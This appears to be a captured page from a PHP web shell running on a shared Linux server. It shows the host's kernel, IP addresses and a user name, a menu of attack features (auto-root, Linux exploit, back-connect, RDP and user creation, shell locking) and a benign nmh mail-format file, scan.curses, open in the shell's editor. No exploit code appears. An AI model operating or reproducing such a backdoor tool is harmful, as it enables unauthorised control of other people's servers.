Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
etc /
nmh /
[ HOME SHELL ]
Name
Size
Permission
Action
MailAliases
1.27
KB
-rw-r--r--
bash_completion_nmh
11.05
KB
-rw-r--r--
components
827
B
-rw-r--r--
digestcomps
789
B
-rw-r--r--
distcomps
672
B
-rw-r--r--
forwcomps
1.21
KB
-rw-r--r--
mhical.12hour
2.05
KB
-rw-r--r--
mhical.24hour
2.06
KB
-rw-r--r--
mhl.body
46
B
-rw-r--r--
mhl.digest
193
B
-rw-r--r--
mhl.format
411
B
-rw-r--r--
mhl.forward
284
B
-rw-r--r--
mhl.headers
447
B
-rw-r--r--
mhl.reply
196
B
-rw-r--r--
mhl.replywithoutbody
175
B
-rw-r--r--
mhn.defaults
4.44
KB
-rw-r--r--
mhshow.marker
304
B
-rw-r--r--
mts.conf
1.78
KB
-rw-r--r--
rcvdistcomps
141
B
-rw-r--r--
rcvdistcomps.outbox
161
B
-rw-r--r--
replcomps
1.41
KB
-rw-r--r--
replgroupcomps
1.46
KB
-rw-r--r--
scan.MMDDYY
397
B
-rw-r--r--
scan.YYYYMMDD
381
B
-rw-r--r--
scan.curses
2.02
KB
-rw-r--r--
scan.default
473
B
-rw-r--r--
scan.highlighted
1.46
KB
-rw-r--r--
scan.mailx
291
B
-rw-r--r--
scan.nomime
378
B
-rw-r--r--
scan.size
263
B
-rw-r--r--
scan.time
302
B
-rw-r--r--
scan.timely
422
B
-rw-r--r--
scan.unseen
270
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : scan.curses
%; scan.curses %; %; This file shows how to use function escapes to enable highlighting %; sequences for terminals that have the appropriate entries in their %; termcap/terminfo files. Also it goes into more detail on exactly %; what each line does. %; %; See mh-format(5) for more information on these function escapes. %; %; %; First, test to see if this is the current message. If it is, then %; output the standout sequence for this terminal (or the color red). %; We use %(zputlit) so the %; characters we output don't count against the terminal width. %; %<(cur)%<(hascolor)%(zputlit(fgcolor red))%|%(zputlit(standout))%>%>\ %; %; If it's unseen, mark it with bold (or the color green) %; %<(unseen)%<(hascolor)%(zputlit(fgcolor green))%|%(zputlit(bold))%>%>\ %; %; Next, output the message number. We print it out using 4 digits, right- %; justified, padding with spaces. %; %4(msg)\ %; %; If it's the current message, output a '+' in the next column, otherwise %; a space. Also use '-' if it's got a "Replied" header and 'E' if it's %; encrypted (not currently supported) %; %<(cur)+%| %>%<{replied}-%?{encrypted}E%| %>\ %; %; Output the date, but mark it with a '*' if it's missing and was synthesized. %; Note the use of 02 to make sure the date is padded with a leading zero. %; %02(mon{date})/%02(mday{date})%<{date} %|*%>\ %; %; If the message is from me, print out who the message was sent to. %; Otherwise, print out who it was from. %<(mymbox{from})%<{to}To:%14(unquote(decode(friendly{to})))%>%>\ %<(zero)%17(unquote(decode(friendly{from})))%> \ %; %; Print out the subject and any of the message body that will fit on the %; rest of the line. After that, print the terminal reset code to reset %; all of the attributes to the next line. %; %; There's actually special handling in the format engine that will output %; any data specified with %(zputlit) even if you've exceeded the column %; width, so it's safe to put any reset characters at the end; they'll %; still be output. %; %(decode{subject})%<{body}<<%{body}>>%>%(zputlit(resetterm))
Close